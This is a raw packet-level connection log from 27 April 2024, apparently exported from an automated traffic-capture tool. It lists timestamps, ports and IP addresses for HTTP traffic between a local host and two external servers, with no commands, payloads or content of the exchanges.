Apr 27, 2024 01:31:18.826930046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826958895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.826963902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.826997042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.827007055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.827034950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.827049017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.827075005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.827080965 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.827115059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.827126980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.827153921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.827167034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.827193975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.827204943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.827234030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.827244997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.827274084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.827284098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.827312946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.827325106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.827351093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.827363014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.827389956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.827402115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.827430010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.827440023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.827478886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.883812904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.883879900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.883909941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.883923054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.917277098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.917320013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.917356968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.917395115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.917437077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.917478085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.917500973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.917524099 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.917558908 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.917642117 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.917682886 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.917707920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.917743921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.917797089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.917834997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.917855978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.917877913 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.917911053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.917946100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.917967081 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.918010950 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.918102980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.918155909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.918171883 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.918199062 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.018217087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018260956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018301964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018338919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018341064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.018383980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.018399000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018439054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018476009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018477917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.018506050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.018516064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018538952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.018565893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.018572092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018625021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018663883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018667936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.018707991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018711090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.018747091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018754959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.018785954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018795013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.018825054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018826962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.018865108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018868923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.018904924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018910885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.018944979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018981934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.018985033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.018994093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.019025087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.021542072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.021612883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.021660089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.021707058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.021727085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.021816015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.021862030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.021869898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.021899939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.021914005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.021943092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.021982908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022022009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022028923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.022051096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.022059917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.022063017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022114992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.022381067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022440910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.022461891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022515059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.022536039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022581100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022588015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.022623062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.022671938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022710085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022748947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022782087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.022789001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022829056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022897959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022922993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.022937059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022974968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.022995949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.023014069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023051977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023061037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.023133993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023174047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023178101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.023212910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023251057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023267984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.023291111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023361921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023408890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.023417950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023457050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023463011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.023494959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023535013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023574114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023585081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.023614883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.023647070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023685932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023756027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023796082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023865938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023905039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.023941994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024013996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024084091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024128914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.024141073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024178982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024215937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.024215937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024249077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.024255037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024256945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.024293900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024364948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024404049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024421930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.024444103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024447918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.024482965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024522066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024561882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024565935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.024602890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024607897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.024642944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024681091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024719000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024729013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.024758101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.024763107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.024797916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.025779009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.078324080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.078392982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.078531027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.088896990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.088941097 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.088979959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.089021921 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.089059114 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.089101076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.089133978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.089167118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.089209080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.089234114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.089261055 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.089292049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.089379072 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.089396000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.089431047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.089468956 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.089508057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.089546919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.089603901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.089649916 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.089698076 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.089749098 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.089767933 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.214071989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214135885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214179993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214220047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214263916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214274883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.214303017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214344025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214354038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.214378119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.214385986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214426041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214466095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214477062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.214507103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214514017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.214545012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214581966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214617968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.214620113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214658976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214668989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.214699984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214737892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214772940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214788914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.214812994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.214834929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.216687918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.216840982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.217010975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.217045069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.217053890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.217072010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.217093945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.217132092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.217171907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.217183113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.217211008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.217220068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.217250109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.217328072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.217372894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.217521906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.217571974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.217979908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.218135118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.218385935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.218449116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.218569994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.218611956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.218651056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.218660116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.218688965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.218689919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.218728065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.218766928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.218805075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.218812943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.218843937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.218851089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.218884945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.218924046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.218962908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.218966007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.219001055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.219005108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.219041109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.219234943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.219281912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.219307899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.219346046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.219352007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.219733953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.219775915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.219825983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.219827890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.219868898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.219873905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.219909906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.219949007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.219986916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.219994068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.220026016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220027924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.220063925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220125914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220165968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220175982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.220205069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220210075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.220246077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220284939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220323086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220343113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.220361948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220377922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.220402956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220441103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220479012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220487118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.220518112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220530987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.220562935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220602036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220648050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.220710993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220752954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220765114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.220793962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220834017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220871925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220887899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.220912933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220921040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.220952988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.220992088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.221030951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.221036911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.221071005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.221076965 CEST	49734	80	192.168.2.4	176.97.76.106
